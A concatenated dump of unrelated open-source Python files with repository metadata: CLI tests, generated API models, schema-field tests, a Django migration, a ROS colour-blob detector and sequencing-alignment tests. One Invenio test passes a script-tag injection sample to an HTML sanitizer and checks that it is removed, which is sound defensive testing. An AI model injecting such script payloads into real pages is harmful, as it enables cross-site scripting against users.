args=({'userStatusId': 1021},), identifier=12345)
@mock.patch('SoftLayer.CLI.user.delete.click')
def test_delete_failure(self, click):
mock = self.set_mock('SoftLayer_User_Customer', 'editObject')
mock.return_value = False
result = self.run_command(['user', 'delete', '12345'])
click.secho.assert_called_with('Failed to delete 12345', fg='red')
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'editObject',
args=({'userStatusId': 1021},), identifier=12345)
| 45.992647 | 108 | 0.639648 |
79555079ca5ffd97d65c0c8f0eea2dc09b80eead | 4,565 | py | Python | simscale_sdk/models/dimensional_function_acceleration.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | 8 | 2021-01-22T13:41:03.000Z | 2022-01-03T09:00:10.000Z | simscale_sdk/models/dimensional_function_acceleration.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | null | null | null | simscale_sdk/models/dimensional_function_acceleration.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | 3 | 2021-03-18T15:52:52.000Z | 2022-01-03T08:59:30.000Z | # coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class DimensionalFunctionAcceleration(object):
    """OpenAPI model for a dimensional acceleration quantity.

    Pairs a ``value`` (any ``OneOfDimensionalFunctionAccelerationValue``)
    with a physical ``unit`` restricted to ``"m/s²"`` or ``"in/s²"``.
    Generated-code layout follows the openapi-generator conventions.
    """

    # Attribute name -> OpenAPI type; drives ``to_dict``.
    openapi_types = {
        'value': 'OneOfDimensionalFunctionAccelerationValue',
        'unit': 'str'
    }

    # Attribute name -> JSON property name.
    attribute_map = {
        'value': 'value',
        'unit': 'unit'
    }

    def __init__(self, value=None, unit=None, local_vars_configuration=None):  # noqa: E501
        """DimensionalFunctionAcceleration - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration
        self._value = None
        self._unit = None
        self.discriminator = None
        if value is not None:
            self.value = value
        # ``unit`` is assigned unconditionally so the setter can validate
        # (and reject) a missing unit.
        self.unit = unit

    @property
    def value(self):
        """The acceleration value of this model.

        :return: The value of this DimensionalFunctionAcceleration.
        :rtype: OneOfDimensionalFunctionAccelerationValue
        """
        return self._value

    @value.setter
    def value(self, value):
        """Set the acceleration value (no validation is applied)."""
        self._value = value

    @property
    def unit(self):
        """The physical unit of this model ("m/s²" or "in/s²").

        :rtype: str
        """
        return self._unit

    @unit.setter
    def unit(self, unit):
        """Set the unit, validating against the allowed choices.

        :raises ValueError: when client-side validation is enabled and
            ``unit`` is ``None`` or not one of the allowed units.
        """
        validate = self.local_vars_configuration.client_side_validation
        if validate and unit is None:  # noqa: E501
            raise ValueError("Invalid value for `unit`, must not be `None`")  # noqa: E501
        allowed_values = ["m/s²", "in/s²"]  # noqa: E501
        if validate and unit not in allowed_values:  # noqa: E501
            raise ValueError(
                "Invalid value for `unit` ({0}), must be one of {1}"  # noqa: E501
                .format(unit, allowed_values)
            )
        self._unit = unit

    def to_dict(self):
        """Return the model's properties as a plain ``dict``."""
        def _convert(item):
            # Recurse into nested models that expose to_dict().
            return item.to_dict() if hasattr(item, "to_dict") else item

        result = {}
        for attr in self.openapi_types:
            attr_value = getattr(self, attr)
            if isinstance(attr_value, list):
                result[attr] = [_convert(entry) for entry in attr_value]
            elif hasattr(attr_value, "to_dict"):
                result[attr] = attr_value.to_dict()
            elif isinstance(attr_value, dict):
                result[attr] = {key: _convert(val)
                                for key, val in attr_value.items()}
            else:
                result[attr] = attr_value
        return result

    def to_str(self):
        """Return the string representation of the model."""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Models are equal when their dict representations match."""
        if not isinstance(other, DimensionalFunctionAcceleration):
            return False
        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Inverse of ``__eq__``."""
        if not isinstance(other, DimensionalFunctionAcceleration):
            return True
        return self.to_dict() != other.to_dict()
795551b900d78f471b67f0886aa86c21a508e044 | 5,584 | py | Python | tests/test_custom_fields.py | NRodriguezcuellar/invenio-records-rest | c4a3717afcf9b08b6e42f3529addecc64bb2e47c | [
"MIT"
] | 5 | 2017-10-22T00:13:49.000Z | 2019-10-04T11:35:18.000Z | tests/test_custom_fields.py | NRodriguezcuellar/invenio-records-rest | c4a3717afcf9b08b6e42f3529addecc64bb2e47c | [
"MIT"
] | 221 | 2015-10-30T23:27:52.000Z | 2022-03-07T13:17:55.000Z | tests/test_custom_fields.py | NRodriguezcuellar/invenio-records-rest | c4a3717afcf9b08b6e42f3529addecc64bb2e47c | [
"MIT"
] | 60 | 2015-10-30T22:43:27.000Z | 2022-02-10T10:08:08.000Z | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Invenio custom schema fields tests."""
import pytest
from invenio_pidstore.models import PersistentIdentifier as PIDModel
from invenio_records import Record
from invenio_rest.serializer import BaseSchema as Schema
from marshmallow import __version_info__ as marshmallow_version
from marshmallow import missing
from invenio_records_rest.schemas import StrictKeysMixin
from invenio_records_rest.schemas.fields import DateString, GenFunction, \
GenMethod, PersistentIdentifier, SanitizedHTML, SanitizedUnicode, \
TrimmedString
if marshmallow_version[0] >= 3:
schema_to_use = Schema
from marshmallow import EXCLUDE
else:
schema_to_use = StrictKeysMixin
class CustomFieldSchema(schema_to_use):
"""Test schema."""
if marshmallow_version[0] >= 3:
class Meta:
"""."""
unknown = EXCLUDE
date_string_field = DateString(attribute='date_string_field')
sanitized_html_field = SanitizedHTML(attribute='sanitized_html_field')
sanitized_unicode_field = SanitizedUnicode(
attribute='sanitized_unicode_field')
trimmed_string_field = TrimmedString(
attribute='trimmed_string_field')
gen_function_field = GenFunction(
lambda o: 'serialize_gen_function_field',
lambda o: 'deserialize_gen_function_field',
)
gen_method_field = GenMethod(
'serialize_gen_method_field',
'deserialize_gen_method_field')
persistent_identifier_field = PersistentIdentifier()
def serialize_gen_method_field(self, obj):
"""Serialize a value for the GenMethod field."""
return 'serialize_gen_method_field'
def deserialize_gen_method_field(self, value):
"""Deserialize a value for the GenMethod field."""
return 'deserialize_gen_method_field'
def test_load_custom_fields(app):
"""Test loading of custom fields."""
rec = Record({'date_string_field': '1999-10-27',
'sanitized_html_field': 'an <script>evil()</script> example',
# Zero-width space, Line Tabulation, Escape, Cancel
'sanitized_unicode_field': u'\u200b\u000b\u001b\u0018',
'trimmed_string_field': 'so much trailing whitespace '})
recid = PIDModel(pid_type='recid', pid_value='12345')
loaded_data = CustomFieldSchema(context={'pid': recid}).load(rec).data
if 'metadata' in loaded_data:
values = loaded_data['metadata'].values()
else:
values = loaded_data.values()
assert set(values) == \
set(['1999-10-27', 'so much trailing whitespace',
'an evil() example', u'', '12345',
'deserialize_gen_method_field', 'deserialize_gen_function_field'])
def test_custom_generated_fields():
"""Test fields.generated fields."""
def serialize_func(obj, ctx):
return ctx.get('func-foo', obj.get('func-bar', missing))
def deserialize_func(value, ctx, data):
return ctx.get('func-foo', data.get('func-bar', missing))
class GeneratedFieldsSchema(schema_to_use):
"""Test schema."""
if marshmallow_version[0] >= 3:
class Meta:
"""Meta attributes for the schema."""
unknown = EXCLUDE
gen_function = GenFunction(
serialize=serialize_func,
deserialize=deserialize_func,
)
gen_method = GenMethod(
serialize='_serialize_gen_method',
deserialize='_desererialize_gen_method',
missing='raises-warning',
)
def _serialize_gen_method(self, obj):
# "meth-foo" from context or "meth-bar" from the object
return self.context.get(
'meth-foo', obj.get('meth-bar', missing))
def _desererialize_gen_method(self, value, data):
# "meth-foo" from context or "meth-bar" from the data
return self.context.get(
'meth-foo', data.get('meth-bar', missing))
ctx = {
'func-foo': 'ctx-func-value',
'meth-foo': 'ctx-meth-value',
}
data = {
'func-bar': 'data-func-value',
'meth-bar': 'data-meth-value',
'gen_function': 'original-func-value',
'gen_method': 'original-meth-value',
}
# No context, no data
assert GeneratedFieldsSchema().load({}).data == {}
assert GeneratedFieldsSchema().dump({}).data == {}
# Only context
assert GeneratedFieldsSchema(context=ctx).load({}).data == {
'gen_function': 'ctx-func-value',
'gen_method': 'ctx-meth-value',
}
assert GeneratedFieldsSchema(context=ctx).dump({}).data == {
'gen_function': 'ctx-func-value',
'gen_method': 'ctx-meth-value',
}
# Only data
assert GeneratedFieldsSchema().load(data).data == {
'gen_function': 'data-func-value',
'gen_method': 'data-meth-value',
}
assert GeneratedFieldsSchema().dump(data).data == {
'gen_function': 'data-func-value',
'gen_method': 'data-meth-value',
}
# Context and data
assert GeneratedFieldsSchema(context=ctx).load(data).data == {
'gen_function': 'ctx-func-value',
'gen_method': 'ctx-meth-value',
}
assert GeneratedFieldsSchema(context=ctx).dump(data).data == {
'gen_function': 'ctx-func-value',
'gen_method': 'ctx-meth-value',
}
| 33.437126 | 79 | 0.645774 |
795551e17833f98b83fd1a6fc340bfc8a30f8a39 | 1,800 | py | Python | blousebrothers/confs/migrations/0056_auto_20171026_1356.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
] | 1 | 2022-01-27T11:58:10.000Z | 2022-01-27T11:58:10.000Z | blousebrothers/confs/migrations/0056_auto_20171026_1356.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
] | 5 | 2021-03-19T00:01:54.000Z | 2022-03-11T23:46:21.000Z | blousebrothers/confs/migrations/0056_auto_20171026_1356.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2017-10-26 13:56
from __future__ import unicode_literals
from decimal import Decimal
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('confs', '0055_auto_20171016_0854'),
]
operations = [
migrations.AddField(
model_name='conference',
name='correction_dispo',
field=models.BooleanField(default=True, help_text="Désactive l'accès à la correction si tu fais une correction en présentiel. N'oublie pas de le ré-activer après !", verbose_name='Correction accessible'),
),
migrations.AlterField(
model_name='conference',
name='for_sale',
field=models.BooleanField(default=True, help_text="Publier mon dossier avec les paramètres sélectionnés. Je certifie que le matériel de ma conférence est original et je dégage BlouseBrothers de toute responsabilité concernant son contenu. Je suis au courant de mes obligations en matière de fiscalité, détaillées dans les <a href='/cgu/'>conditions générales d'utilisation</a>.", verbose_name='Accessible à tous'),
),
migrations.AlterField(
model_name='conference',
name='for_share',
field=models.BooleanField(default=True, help_text="Le dossier est accessible aux personnes autorisées dans la section <a href='/amis'>Amis</a>, même si le dossier n'est pas accessible publiquement.", verbose_name='Accessible à mes élèves / amis'),
),
migrations.AlterField(
model_name='conference',
name='price',
field=models.DecimalField(decimal_places=2, default=Decimal('1'), help_text='', max_digits=6, verbose_name='Prix de vente'),
),
]
| 48.648649 | 426 | 0.68 |
7955540a462c2926c616da2b9b0d1493618ea5f2 | 3,550 | py | Python | catkin_ws/src/ros_cap/src/line_detector.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | null | null | null | catkin_ws/src/ros_cap/src/line_detector.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | null | null | null | catkin_ws/src/ros_cap/src/line_detector.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | null | null | null | #!/usr/bin/env python
import math
import rospy
import cv2
from sensor_msgs.msg import Image
from geometry_msgs.msg import Point
from std_srvs.srv import Empty, EmptyResponse
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
# define range of blue color in HSV
lower_blue = np.array([110,50,50])
upper_blue = np.array([130,255,255])
lower_red = np.array([0,0,0])
upper_red = np.array([0,0,0])
lower_yellow = np.array([20,150,130])
upper_yellow = np.array([35,255,255])
lower_white=np.array([180,0,200])
upper_white=np.array([180,90,255])
class BlobColor():
def __init__(self):
#Subscribirce al topico "/duckiebot/camera_node/image/raw" para recibir imagen
self.image_subscriber = rospy.Subscriber("/duckiebot/camera_node/image/raw",Image,self._process_image)
#Clase necesaria para transformar el tipo de imagen
self.bridge = CvBridge()
#Ultima imagen adquirida
self.cv_image = Image()
#Area minima
self.min_area = 30
#Publicar a los topicos "
self.pub = rospy.Publisher("/duckiebot/patofiltrado",Image,queue_size=1)
self.publito = rospy.Publisher("/duckiebot/punto",Point,queue_size=1)
print("explotando en 3, 2, 1...")
def _process_image(self,img):
#Se cambiar mensage tipo ros a imagen opencv
try:
self.cv_image = self.bridge.imgmsg_to_cv2(img, "bgr8")
except CvBridgeError as e:
print(e)
#Se deja en frame la imagen actual
frame = self.cv_image
#Cambiar tipo de color de BGR a HSV
color_space = cv2.COLOR_BGR2HSV
image_out = cv2.cvtColor(frame, color_space)
# Filtrar colores de la imagen en el rango utilizando
mask = cv2.inRange(image_out, lower_white, upper_white)
# Bitwise-AND mask and original image
#segment_image = cv2.bitwise_and(frame,frame, mask= mask)
#imga= self.bridge.cv2_to_imgmsg(segment_image, "bgr8")
#self.pub.publish(imga)
kernel = np.ones((5,5),np.uint8)
#Operacion morfologica erode
img_out = cv2.erode(mask, kernel, iterations = 1)
#Operacion morfologica dilate
img_out = cv2.dilate(img_out, kernel, iterations = 1)
image, contours, hierarchy = cv2.findContours(img_out,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
x1=0
x2=0
y1=0
y2=0
for cnt in contours:
#Obtener rectangulo
x,y,w,h = cv2.boundingRect(cnt)
#Filtrar por area minima
if w*h > self.min_area:
#Dibujar un rectangulo en la imagen
x1=x
y1=y
x2=x+w
y2=y+h
frame=cv2.rectangle(frame, (x1,y1), (x2,y2), (80,20,77), 2)
#Publicar Point center de mayor tamanio
puntillo=Point()
puntillo.x=((x1+x2)/2)
puntillo.y=((y1+y2)/2)
#Foco respecto a X fx truncado
puntillo.z=(310.089*3.5/w)
#foco respecto a Y fy truncado
#puntillo.z=(309.71*3.5/sqrt(y1^2+y2^2))
self.publito.publish(puntillo)
#Publicar frame
#imagesita=cv2.cvtColor(rectangle,cv2.COLOR_GRAY2BGR)
imgb= self.bridge.cv2_to_imgmsg(frame, "bgr8")
self.pub.publish(imgb)
def main():
rospy.init_node('BlobColor')
BlobColor()
rospy.spin()
if __name__ == '__main__':
main()
| 28.174603 | 111 | 0.605634 |
7955546d7eac7b111e7f6a56f844331fc31b3ee3 | 777 | py | Python | src/utils/images.py | bradley-erickson/dash-app-structure | 59ebd32626661c047a5baef38a5a0a9aa855243e | [
"MIT"
] | null | null | null | src/utils/images.py | bradley-erickson/dash-app-structure | 59ebd32626661c047a5baef38a5a0a9aa855243e | [
"MIT"
] | null | null | null | src/utils/images.py | bradley-erickson/dash-app-structure | 59ebd32626661c047a5baef38a5a0a9aa855243e | [
"MIT"
] | null | null | null | # notes
'''
This file is used for handling anything image related.
I suggest handling the local file encoding/decoding here as well as fetching any external images.
'''
# package imports
import base64
import os
# image CDNs
image_cdn = 'https://images.dog.ceo/breeds'
# logo information
cwd = os.getcwd()
logo_path = os.path.join(cwd, 'src', 'assets', 'logos', 'logo_main.png')
logo_tunel = base64.b64encode(open(logo_path, 'rb').read())
logo_encoded = 'data:image/png;base64,{}'.format(logo_tunel.decode())
def get_dog_image(breed, name):
'''
This method assumes that you are fetching specific images hosted on a CDN.
For instance, random dog pics given a breed.
'''
if breed and name:
return f'{image_cdn}/{breed}/{name}.jpg'
return None
| 26.793103 | 97 | 0.706564 |
79555601e6d891e58393af1464d338d5ed786b72 | 97 | py | Python | layers/functions/__init__.py | Rocketbase-AI/rockets-igor_ssd | c8979059b2f011b8f90d671cc544994a5835bb9c | [
"MIT"
] | 5,144 | 2017-03-16T15:05:34.000Z | 2022-03-30T11:41:10.000Z | layers/functions/__init__.py | snakers4/fish-ssd | 8ff1a3004a4ef0a93b665f6e58f25a1fc854af40 | [
"MIT"
] | 538 | 2017-03-29T02:39:26.000Z | 2022-03-24T07:30:33.000Z | layers/functions/__init__.py | snakers4/fish-ssd | 8ff1a3004a4ef0a93b665f6e58f25a1fc854af40 | [
"MIT"
] | 2,051 | 2017-03-17T00:42:48.000Z | 2022-03-29T01:58:38.000Z | from .detection import Detect
from .prior_box import PriorBox
__all__ = ['Detect', 'PriorBox']
| 16.166667 | 32 | 0.752577 |
7955560a4363b88aa9fa09451a8a4dcc1950f23f | 11,514 | py | Python | services/traction/acapy_client/model/indy_non_revoc_proof.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 12 | 2022-01-29T20:30:03.000Z | 2022-03-29T11:46:14.000Z | services/traction/acapy_client/model/indy_non_revoc_proof.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 38 | 2021-11-22T17:52:50.000Z | 2022-03-31T17:52:00.000Z | services/traction/acapy_client/model/indy_non_revoc_proof.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 9 | 2021-11-22T18:05:48.000Z | 2022-03-29T11:25:08.000Z | """
Aries Cloud Agent
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v0.7.2
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from acapy_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel,
)
from acapy_client.exceptions import ApiAttributeError
class IndyNonRevocProof(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (
bool,
date,
datetime,
dict,
float,
int,
list,
str,
none_type,
) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"c_list": ({str: (str,)},), # noqa: E501
"x_list": ({str: (str,)},), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
"c_list": "c_list", # noqa: E501
"x_list": "x_list", # noqa: E501
}
read_only_vars = {}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""IndyNonRevocProof - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
c_list ({str: (str,)}): [optional] # noqa: E501
x_list ({str: (str,)}): [optional] # noqa: E501
"""
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_path_to_item = kwargs.pop("_path_to_item", ())
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set(
[
"_data_store",
"_check_type",
"_spec_property_naming",
"_path_to_item",
"_configuration",
"_visited_composed_classes",
]
)
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""IndyNonRevocProof - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
c_list ({str: (str,)}): [optional] # noqa: E501
x_list ({str: (str,)}): [optional] # noqa: E501
"""
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_path_to_item = kwargs.pop("_path_to_item", ())
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(
f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes."
)
| 41.869091 | 124 | 0.557061 |
79555778cf0aa45569038527c05d0c423b9a2d8a | 385 | py | Python | src/suss/wsgi.py | marzoukali/suss | 5073ace3621284ae135e2f7f0c228bce327b3b08 | [
"MIT"
] | null | null | null | src/suss/wsgi.py | marzoukali/suss | 5073ace3621284ae135e2f7f0c228bce327b3b08 | [
"MIT"
] | null | null | null | src/suss/wsgi.py | marzoukali/suss | 5073ace3621284ae135e2f7f0c228bce327b3b08 | [
"MIT"
] | null | null | null | """
WSGI config for suss project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'suss.settings')
application = get_wsgi_application()
| 22.647059 | 78 | 0.781818 |
79555a9b278df67ae29f49dce8f719a7af2c6b8f | 2,642 | py | Python | hio-yocto-bsp/sources/poky/scripts/lib/mic/3rdparty/pykickstart/commands/zerombr.py | qiangzai00001/hio-prj | 060ff97fe21093b1369db78109d5b730b2b181c8 | [
"MIT"
] | null | null | null | hio-yocto-bsp/sources/poky/scripts/lib/mic/3rdparty/pykickstart/commands/zerombr.py | qiangzai00001/hio-prj | 060ff97fe21093b1369db78109d5b730b2b181c8 | [
"MIT"
] | null | null | null | hio-yocto-bsp/sources/poky/scripts/lib/mic/3rdparty/pykickstart/commands/zerombr.py | qiangzai00001/hio-prj | 060ff97fe21093b1369db78109d5b730b2b181c8 | [
"MIT"
] | null | null | null | #
# Chris Lumens <clumens@redhat.com>
#
# Copyright 2005, 2006, 2007 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat
# trademarks that are incorporated in the source code or documentation are not
# subject to the GNU General Public License and may only be used or replicated
# with the express permission of Red Hat, Inc.
#
import warnings
from pykickstart.base import *
from pykickstart.options import *
import gettext
_ = lambda x: gettext.ldgettext("pykickstart", x)
class FC3_ZeroMbr(KickstartCommand):
removedKeywords = KickstartCommand.removedKeywords
removedAttrs = KickstartCommand.removedAttrs
def __init__(self, writePriority=110, *args, **kwargs):
KickstartCommand.__init__(self, writePriority, *args, **kwargs)
self.op = self._getParser()
self.zerombr = kwargs.get("zerombr", False)
def __str__(self):
retval = KickstartCommand.__str__(self)
if self.zerombr:
retval += "# Clear the Master Boot Record\nzerombr\n"
return retval
def _getParser(self):
op = KSOptionParser()
return op
def parse(self, args):
(opts, extra) = self.op.parse_args(args=args, lineno=self.lineno)
if len(extra) > 0:
warnings.warn(_("Ignoring deprecated option on line %s: The zerombr command no longer takes any options. In future releases, this will result in a fatal error from kickstart. Please modify your kickstart file to remove any options.") % self.lineno, DeprecationWarning)
self.zerombr = True
return self
class F9_ZeroMbr(FC3_ZeroMbr):
removedKeywords = FC3_ZeroMbr.removedKeywords
removedAttrs = FC3_ZeroMbr.removedAttrs
def parse(self, args):
(opts, extra) = self.op.parse_args(args=args, lineno=self.lineno)
if len(extra) > 0:
raise KickstartParseError, formatErrorMsg(self.lineno, msg=_("Kickstart command %s does not take any arguments") % "zerombr")
self.zerombr = True
return self
| 37.742857 | 283 | 0.715367 |
79555b5bbae0f22bd1f327ae2a1898e232a55dfc | 14,599 | py | Python | test/consam_test/alignments_test.py | umich-brcf-bioinf/Connor | b20e9f36e9730c29eaa27ea5fa8b0151e58d2f13 | [
"Apache-2.0"
] | 22 | 2016-08-30T16:56:33.000Z | 2021-11-20T15:32:35.000Z | test/consam_test/alignments_test.py | umich-brcf-bioinf/Connor | b20e9f36e9730c29eaa27ea5fa8b0151e58d2f13 | [
"Apache-2.0"
] | 11 | 2017-02-14T20:46:31.000Z | 2020-04-21T14:32:20.000Z | test/consam_test/alignments_test.py | umich-brcf-bioinf/Connor | b20e9f36e9730c29eaa27ea5fa8b0151e58d2f13 | [
"Apache-2.0"
] | 6 | 2016-12-07T09:13:26.000Z | 2021-11-20T15:34:52.000Z | #pylint: disable=invalid-name, too-few-public-methods, too-many-public-methods
#pylint: disable=protected-access, missing-docstring, too-many-locals
#pylint: disable=too-many-arguments,deprecated-method
from __future__ import print_function, absolute_import, division
from test.utils_test import MicroMock
from test.utils_test import BaseConnorTestCase
from connor.consam.alignments import ConnorAlign
from connor.consam.alignments import PairedAlignment
class ConnorAlignTest(BaseConnorTestCase):
def test_eq(self):
pysam_align = self.mock_align(query_name="align1")
base = ConnorAlign(pysam_align)
self.assertEqual(base, base)
self.assertEqual(base, ConnorAlign(pysam_align))
self.assertEqual(base, ConnorAlign(self.mock_align(query_name = "align1")))
different_pysam_align = ConnorAlign(self.mock_align(query_name = "align2"))
self.assertNotEqual(base, different_pysam_align)
different_filter = ConnorAlign(pysam_align)
different_filter.filter_value = "foo; bar"
self.assertNotEqual(base, different_filter)
def test_hash(self):
pysam_align_A_42 = self.mock_align(query_name="A", reference_start=42)
pysam_align_B_42 = self.mock_align(query_name="B", reference_start=42)
pysam_align_A_43 = self.mock_align(query_name="A", reference_start=43)
base = ConnorAlign(pysam_align_A_42, filter_value="f1")
same = ConnorAlign(pysam_align_A_42, filter_value="f1")
different_query_name = ConnorAlign(pysam_align_B_42, filter_value="f1")
different_start = ConnorAlign(pysam_align_A_43, filter_value="f1")
different_filter = ConnorAlign(pysam_align_A_42, filter_value="f2")
self.assertEqual(base.__hash__(), same.__hash__())
self.assertNotEqual(base.__hash__(), different_query_name.__hash__())
self.assertNotEqual(base.__hash__(), different_start.__hash__())
self.assertNotEqual(base.__hash__(), different_filter.__hash__())
def test_gettersPassthroughToPysamAlignSegment(self):
pysam_align = self.mock_align(query_name="queryname_1",
flag=99,
